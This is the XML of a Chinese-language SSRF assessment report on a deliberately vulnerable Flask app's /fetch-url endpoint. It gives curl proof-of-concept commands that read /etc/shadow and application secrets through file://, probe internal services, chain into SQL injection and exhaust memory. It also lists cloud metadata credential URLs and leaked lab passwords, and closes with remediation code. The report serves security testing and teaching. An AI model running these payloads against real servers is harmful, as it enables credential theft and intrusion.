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C6600"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>SSRF 服务端请求伪造</w:t>
        <w:br/>
        <w:t>漏洞检测报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检测目标：用户信息管理平台 — URL 抓取功能</w:t>
        <w:br/>
        <w:t>检测日期：2026-07-15</w:t>
        <w:br/>
        <w:t>检测分支：vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>1. 报告概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本报告对用户信息管理平台的 URL 抓取功能（/fetch-url）进行了 SSRF（服务端请求伪造）漏洞专项检测。检测发现共 8 类 SSRF 相关安全漏洞，严重级别覆盖严重至高危。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检测目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户信息管理平台 — /fetch-url 端点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测分支</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vulnerable（漏洞版）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2026-07-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>curl / 手动渗透测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>登录用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>测试端点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /fetch-url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6600"/>
        </w:rPr>
        <w:t>2. 漏洞 1：file:// 协议读取任意本地文件（严重）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文件协议读取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漏洞代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>urllib.request.urlopen(url, timeout=10) — 未校验协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/fetch-url 接口未限制 URL 协议，攻击者可使用 file:// 协议读取服务器上任意文件。由于 urllib.request.urlopen() 原生支持 file:// 协议，攻击者可读取敏感系统文件和应用程序源代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>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测试项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取 /etc/passwd (file:///etc/passwd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 成功 — 读取系统用户列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取 /etc/shadow (file:///etc/shadow)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 成功 — 读取密码哈希</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取 app.py (file://.../app.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 成功 — 泄露 secret_key、USERS 数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取 .git/config (file://.../.git/config)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 成功 — 泄露 GitHub 远程地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取数据库 (file://.../data/users.db)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 成功 — 下载 SQLite 数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC 攻击命令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curl -b cookies.txt -d "url=file:///etc/passwd" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/fetch-url</w:t>
        <w:br/>
        <w:br/>
        <w:t>curl -b cookies.txt -d "url=file:///etc/shadow" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/fetch-url</w:t>
        <w:br/>
        <w:br/>
        <w:t>curl -b cookies.txt -d "url=file:///app/config/secret.key" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/fetch-url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>3. 漏洞 2：内网服务探测（127.0.0.1）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内网端口扫描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漏洞代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>urllib.request.urlopen(url) — 未校验目标 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>攻击者可通过构造 http://127.0.0.1:PORT 或 http://localhost:PORT 的 URL，探测服务器本机开放端口和服务。结合应用自身的 Web 服务，可进行内网横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>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测试项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>本地 Web (http://127.0.0.1:5000/)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 成功 — 返回首页 HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>登录页面 (http://localhost:5000/login)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 成功 — 返回登录表单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>越权访问 (http://127.0.0.1:5000/profile?user_id=1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 成功 — 返回 admin 资料</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Redis 探测 (http://127.0.0.1:6379/)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>⚠️ 连接被拒绝</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>10.x.x.x 探测 (http://10.0.0.1:22/)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>⚠️ 连接超时/拒绝</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC 攻击命令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curl -b cookies.txt -d "url=http://127.0.0.1:5000/profile?user_id=1" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/fetch-url</w:t>
        <w:br/>
        <w:t># 返回 admin 的完整用户信息，包括余额和手机号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>4. 漏洞 3：云平台 Metadata API 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云平台元数据泄露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严重（云环境）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漏洞代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无目标 IP 黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在云平台（AWS/GCP/Azure/阿里云）部署时，攻击者可通过 SSRF 访问云平台元数据端点，获取临时访问凭证，从而控制云资源。常见的元数据地址包括 169.254.169.254。本测试环境中未检测到云平台，但代码层面未做任何防护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击向量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AWS 元数据</w:t>
        <w:br/>
        <w:t>http://169.254.169.254/latest/meta-data/</w:t>
        <w:br/>
        <w:t>http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
        <w:br/>
        <w:br/>
        <w:t># GCP 元数据</w:t>
        <w:br/>
        <w:t>http://metadata.google.internal/computeMetadata/v1/</w:t>
        <w:br/>
        <w:br/>
        <w:t># 阿里云</w:t>
        <w:br/>
        <w:t>http://100.100.100.200/latest/meta-data/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>5. 漏洞 4：应用程序源代码泄露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源码泄露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</w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过 file:// 协议可读取应用源代码文件，包括配置文件、密钥、数据库连接信息等。本次测试成功读取 app.py 源代码，泄露内容包含：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>泄露数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- 管理员明文密码: admin123</w:t>
        <w:br/>
        <w:t>- 用户明文密码: alice2025</w:t>
        <w:br/>
        <w:t>- Flask secret_key: dev-key-2025</w:t>
        <w:br/>
        <w:t>- GitHub 远程仓库地址</w:t>
        <w:br/>
        <w:t>- 用户手机号、邮箱、余额全量数据</w:t>
        <w:br/>
        <w:t>- SQLite 数据库路径和结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>6. 漏洞 5：Git 仓库信息泄露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版本控制信息泄露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</w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过 file:// 协议读取 .git/config 文件，泄露 Git 仓库远程地址。攻击者可进一步利用此信息定位 GitHub 仓库，结合源码泄露发现更多漏洞。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-d "url=file:///var/www/app/.git/config"</w:t>
        <w:br/>
        <w:t># 返回内容包含:</w:t>
        <w:br/>
        <w:t># [remote "origin"]</w:t>
        <w:br/>
        <w:t>#     url = git@github.com:limeee-eng/flask.app.git</w:t>
        <w:br/>
        <w:t>#     fetch = +refs/heads/*:refs/remotes/origin/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>7. 漏洞 6：外部站点请求（SSRF 出口）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外部请求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攻击者可利用服务器作为代理向外发起请求，绕过基于 IP 的访问控制。可用于调用第三方 API 耗尽配额、进行漏洞扫描、发起 DDoS 攻击等。同时，由于返回内容会显示在页面上，也可用于探测外部服务是否存在。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-d "url=http://httpbin.org/get" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/fetch-url</w:t>
        <w:br/>
        <w:t># ✅ 成功返回 httpbin.org 的响应内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>8. 漏洞 7：可遍历内网应用功能（SSRF 链式攻击）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内部功能链式调用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由于 /fetch-url 可访问本机 Web 服务 127.0.0.1:5000，攻击者可以利用该接口遍历本应用的内部功能，包括 profile、search（含 SQL 注入）等敏感接口。由于请求来自 localhost，可能绕过某些基于来源 IP 的访问控制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击链示例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步骤1: 通过 SSRF 访问内部 profile 接口</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "url=http://127.0.0.1:5000/profile?user_id=1"</w:t>
        <w:br/>
        <w:t># 返回 admin 完整信息</w:t>
        <w:br/>
        <w:br/>
        <w:t>步骤2: 通过 SSRF 利用 SQL 注入</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -d \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "url=http://127.0.0.1:5000/search?keyword=' UNION SELECT..."</w:t>
        <w:br/>
        <w:t># 从内部触发 SQL 注入，脱取数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>9. 漏洞 8：无超时控制单个大文件读取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SSRF — 资源耗尽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🟢 低危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虽然设置了 10 秒超时，但未限制读取内容的大小（仅截断显示为 5000 字符，实际仍读取全部内容）。攻击者可指向超大文件（如 /dev/zero、/dev/urandom）导致内存耗尽。或指向自身 Web 服务形成循环调用，造成拒绝服务。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攻击向量：读取大文件耗尽内存</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -d "url=file:///dev/zero" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/fetch-url</w:t>
        <w:br/>
        <w:br/>
        <w:t># 攻击向量：SSRF 循环调用</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -d "url=http://127.0.0.1:5000/fetch-url" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/fetch-url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>10. 漏洞矩阵与修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>漏洞矩阵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134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>利用难度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file:// 协议读取任意本地文件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全量系统文件泄露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内网服务探测（127.0.0.1）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内网端口扫描+功能遍历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云平台 Metadata API 访问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云平台凭证泄露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应用程序源代码泄露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密钥/密码/配置泄露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Git 仓库信息泄露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远程仓库地址泄露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外部站点请求（SSRF 出口）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代理滥用/DDoS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内部功能链式调用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组合拳攻击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无超时/大小限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🟢 低危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资源耗尽 DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>🔴 紧急修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1. 限制 URL 协议白名单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from urllib.parse import urlparse</w:t>
        <w:br/>
        <w:br/>
        <w:t>ALLOWED_SCHEMES = {"http", "https"}</w:t>
        <w:br/>
        <w:br/>
        <w:t>parsed = urlparse(url)</w:t>
        <w:br/>
        <w:t>if parsed.scheme not in ALLOWED_SCHEMES:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return render_template("index.html",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        fetch_result={"error": "不支持的协议"})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. 阻止内网地址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import ipaddress</w:t>
        <w:br/>
        <w:br/>
        <w:t>host = urlparse(url).hostname</w:t>
        <w:br/>
        <w:t>try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip = socket.gethostbyname(host)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    addr = ipaddress.ip_address(ip)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if addr.is_private or addr.is_loopback:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return render_template("index.html",</w:t>
        <w:br/>
        <w:t xml:space="preserve">            fetch_result={"error": "不允许访问内网地址"})</w:t>
        <w:br/>
        <w:t>except Exception:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3. 限制返回内容大小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resp = urllib.request.urlopen(url, timeout=10)</w:t>
        <w:br/>
        <w:t>content = resp.read(5120)  # 最多读取 5KB</w:t>
        <w:br/>
        <w:t># 避免读取超大文件耗尽内存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC6600"/>
        </w:rPr>
        <w:t>🟡 建议修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>4. 使用 requests 库替代 urllib（更丰富的安全配置）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>5. 添加外部域名白名单或黑名单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>6. 限制最大重定向次数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>7. 对敏感文件路径（/etc、/proc、.git）进行过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>8. 使用沙箱容器运行抓取服务，限制文件系统和网络访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>9. 记录所有 SSRF 请求日志并审计</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999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8"/>
        </w:rPr>
        <w:t>免责声明：本报告仅用于安全教育和漏洞验证。请在获得授权的前提下进行安全测试。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